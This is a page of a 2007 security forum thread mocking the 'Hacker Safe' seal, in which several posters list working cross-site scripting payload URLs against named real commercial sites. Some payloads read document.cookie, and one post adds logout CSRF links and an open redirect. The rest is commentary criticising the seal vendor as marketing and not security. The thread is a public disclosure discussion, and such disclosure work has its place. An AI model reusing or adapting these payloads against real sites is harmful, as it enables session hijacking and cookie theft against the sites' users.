Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous123
Current Page: 3 of 3
Re: Hacker safe!
Posted by: tx
Date: January 25, 2007 04:48PM

*delurk*
A bit late, but here y'all go:

Dentalplans.com #1 (jscript escape): http://dentalplans.com/savingsportal/category.asp?categoryid=';alert('xss');var%20d='yourmom

Dentalplans.com #2: http://dentalplans.com/moreinfo/emailpagetofriend.asp?sURL=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3B%3C%2F%73%63%72%69%70%74%3E

-tx

Options: ReplyQuote
Re: Hacker safe!
Posted by: rsnake
Date: January 25, 2007 06:05PM

Nice shootin' Tex.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Hacker safe!
Posted by: Lockdown
Date: January 31, 2007 07:59PM

Yeah, I'm a bit late too. Damn man, we could totally start our own XSS Security Company. We could totally destroy the reputation of all other companies too (do to their suckage)

A whole lot more "HackerSafe" XSS Vulns:

http://www.acehardware.com/search/noResults.jsp?kw=rofl%3Cscript%3Ealert('xss');%3C/script%3E
https://www.hrsaccount.com/hrs/ecare;jsessionid=?cmd_DisplayContactUsNLI=&org=202&gciOrg=202 << POSTDATA XSS vuln, "> <script>alert("xss");</script> on every entrance in that form, plus the </textarea> .. I'm too lazy to use WhiteAcids script to really illustrate it though.
Actually on the hackersafe "store.aetv.com" http://store.aetv.com/html/search/searchindex.jhtml?search=dvd&itemType=All&x=0&y=0&key=||fat||&_requestid=nullLOLhai%3C%3E'%22hax)-&id=LOL%22;}alert('XSS');%3C/script%3E

Man, I'm disappointed. I can do better. I'll be back later to get a few more.

We rock hard.

Options: ReplyQuote
Re: Hacker safe!
Posted by: tx
Date: February 01, 2007 04:02PM

I came in to work yesterday and I had an email waiting for me from one of my clients asking to add a Hacker Safe logo to his e-commerce site.
I asked him about their services: apparently he's paying just about $2k/yr. for their periodic automated vuln scanning (I checked the scan alert site for the complete list of about 4000 issues they look for, it largely checks version numbers, and there were no issues later than mid 2006 or so).
*sigh* 2 grand a year for "no warranty or claim of any kind, whatsoever, about the accuracy or usefulness of any information provided herein".
Hell, I'd scan their site and provide no warranty for half that!

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 02/01/2007 04:07PM by tx.

Options: ReplyQuote
Re: Hacker safe!
Posted by: SW
Date: February 01, 2007 10:11PM

This thread looks like it was fun. -.-

Their main site uses all html boo.

All i could find:
[www.scanalert.com]

Options: ReplyQuote
Re: Hacker safe!
Posted by: Kyran
Date: February 01, 2007 11:36PM

Great! The hype may have died down a bit, but UXSS is still an issue.

And yeah, the earlier days of the mass finding were very amusing.

- Kyran

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: February 02, 2007 10:22AM

Ghehe i'm sure there are other scan companies, you could try them out.

Options: ReplyQuote
Re: Hacker safe!
Posted by: apnovi
Date: February 08, 2007 04:48PM

Another

http://www.uscav.com/search.aspx?Search=%3cscript%3ealert(%22XSS%22)%3c%2fscript%3e

Options: ReplyQuote
Re: Hacker safe!
Posted by: tx
Date: February 09, 2007 04:40PM

This thread got a mention so I thought I'd throw up a line here.

From DarkReading.com :
"Are 'Sealed' Websites Any Safer?"

http://www.darkreading.com/document.asp?doc_id=116862&print=true

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: Hacker safe!
Posted by: Kyran
Date: February 09, 2007 10:22PM

Hey, I was quoted! :P

But yeah, these little images really do nothing as we already established.

snakeoil.gif

- Kyran

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: February 10, 2007 10:10AM

Haha:

Quote

ScanAlert CEO and founder Ken Leonard says the ROI aspect of the Hacker Safe seal helps IT not only meet a standard of security but also appeals to an organization's marketing department. "The marketing department sees the advantage of Hacker Safe," he says.

"standard of security" Pardon me?

Yeah the marketing department... sees dollar signs, they don't really care about security, they don't care about people's privacy, and they don't care about if YOUR information is stolen, they're out to pick your pocket and nothing else. And they call themselfs "marketeers".

To truly marketeer customers, is based on a relationship, building trust and bonding with them, not lying to them. That takes time, but in the end this customer will be a customer for life.

Options: ReplyQuote
Re: Hacker safe!
Posted by: tx
Date: February 12, 2007 03:37PM

When it comes down to it, they do sell a realistic service (although not a real one). From reviewing their site it's quite obvious that security has little or nothing to do with their product, they are really just selling "customer/user conversion" to e-commerce websites. Which is a valid investment for a e-commerce site, even at the expense of the users privacy/safety. That doesn't mean I don't think that scanalert are taking advantage. they definitely are.
Frankly, I hope some "Hacker Safe" site gets exploited and the users band together and throw up a class action lawsuit...

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: February 13, 2007 07:41PM

I surely do, I've seen enough holes; but do not have the time or interest to exploit it. FUBAR all the way.

:)

Options: ReplyQuote
Re: Hacker safe!
Posted by: FR3DC3RV
Date: March 15, 2007 01:22PM

Search " onclick=javascript:alert(document.cookie)//

http://www.no-ip.com/domSearch.php

-------------------------------
http://fr3dc3rv.blogspot.com

Options: ReplyQuote
Re: Hacker safe!
Posted by: Spencer
Date: March 17, 2007 07:24PM

Or simply: http://www.no-ip.com/whois/?domain=<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Options: ReplyQuote
Re: Hacker safe!
Posted by: FR3DC3RV
Date: March 18, 2007 06:04AM

Some more:

http://www.no-ip.com/newUser.php?email=%22%20onclick=javascript:alert(document.cookie)//&password=&c_password=&firstname=&lastname=&heard_about=&postal_code=&security_q=&security_a=&bmonth=0&bday=dd&byear=yyyy&captcha_id=AXxiNQAY&captcha=&tos=&I%20Accept.%20Create%20my%20Account&Create=submit

http://www.rumo.com.br/sistema/Home.asp?Pagina=FaleConosco&IDLoja=1&Y=6562974305810&Nome=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&Email=a@a.fr&NomeLoja=a&Assunto=1&Mensagem=a&Gravar=+++Enviar+++

Both of them were originally POST but they also work with GET.

https://secure5.electronic-payment.com/members/login.php?s=sp&SID=3&e="><script>alert(document.cookie)</script>

Insert your Username as " onclick=javascript:alert(1)//

https://www.mals-e.com/login.php
https://www.mals-e.com/password.php

CSRF:
Create a new account and login, then try the following URL's and you will be logged out.

http://www.shoppbs.org/home/index.jsp?step=logout

https://secure5.electronic-payment.com/members/login.php?s=logout&SN=Binoculars&SID=3

Redirection:

Press the button and you will be redirected.
http://ww1.aitsafe.com/cf/review.cfm?userid=3100170&return=fr3dc3rv.blogspot.com

-------------------------------
http://fr3dc3rv.blogspot.com



Edited 2 time(s). Last edit at 03/18/2007 12:07PM by FR3DC3RV.

Options: ReplyQuote
Pages: Previous123
Current Page: 3 of 3


Sorry, only registered users may post in this forum.